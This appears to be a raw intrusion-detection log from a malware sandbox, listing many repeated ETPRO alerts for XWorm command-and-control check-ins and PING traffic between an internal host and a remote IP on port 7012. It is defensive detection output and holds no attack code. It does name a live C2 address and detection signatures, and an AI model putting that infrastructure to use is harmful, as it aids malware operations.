                                                          2025-01-03T22:21:05.178012+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.287431+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.287431+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.396730+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.396730+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.506204+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.506204+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.615524+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.615524+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.724951+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.724951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.834410+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.834410+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.838478+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549941147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.946087+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:05.946087+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.053075+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.053075+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.168996+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.168996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.171264+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2457012192.168.2.549941TCP
                                                          2025-01-03T22:21:06.203266+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549941147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.395251+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.395251+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.511189+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.511189+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.631138+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.631138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.740557+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.740557+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.905281+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.905281+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.961054+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:06.961054+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.069194+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.069194+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.185375+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.185375+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.289110+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.289110+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.396683+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.396683+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.506147+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.506147+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.615913+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.615913+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.724871+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.724871+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.834222+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.834222+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.943655+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:07.943655+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.052925+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.052925+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.162457+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.162457+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.271831+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.271831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.381098+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.381098+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.490595+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.490595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.606216+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.606216+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.715048+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.715048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.849957+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:08.849957+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.107397+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.107397+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.244034+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.244034+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.318773+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.318773+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.428535+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.428535+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.538069+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.538069+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.667998+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.667998+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.756176+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.756176+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.865491+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.865491+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.974865+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:09.974865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.303159+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.303159+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.412508+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.412508+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.521952+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.521952+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.631214+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.631214+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.740553+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.740553+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.849894+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.849894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.959183+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:10.959183+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.068587+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.068587+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.177997+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.177997+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.287581+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.287581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.396710+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.396710+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.528483+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.528483+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.638496+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.638496+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.865514+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.865514+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.975320+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:11.975320+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.084282+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.084282+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.193676+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.193676+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.308118+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.308118+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.412556+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.412556+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.523016+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.523016+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.631157+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.631157+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.740541+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.740541+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.849960+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.849960+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.959203+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:12.959203+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.068619+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.068619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.206068+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.206068+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.318523+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.318523+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.428043+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.428043+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.537621+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.537621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.646815+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.646815+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.734255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2457012192.168.2.549941TCP
                                                          2025-01-03T22:21:13.734255+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2457012192.168.2.549941TCP
                                                          2025-01-03T22:21:13.756355+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.756355+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.865430+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.865430+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.974984+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:13.974984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.084368+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.084368+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.275053+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.275053+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.384655+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.384655+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.506690+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.506690+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.615398+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.615398+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.724994+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.724994+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.834181+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.834181+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.943782+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:14.943782+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.056048+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.056048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.164189+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.164189+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.271709+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.271709+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.382409+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.382409+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.491321+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.491321+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.599847+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.599847+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549983147.185.221.2457012TCP
                                                          2025-01-03T22:21:15.709200+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.549983147.185.221.2457012TCP
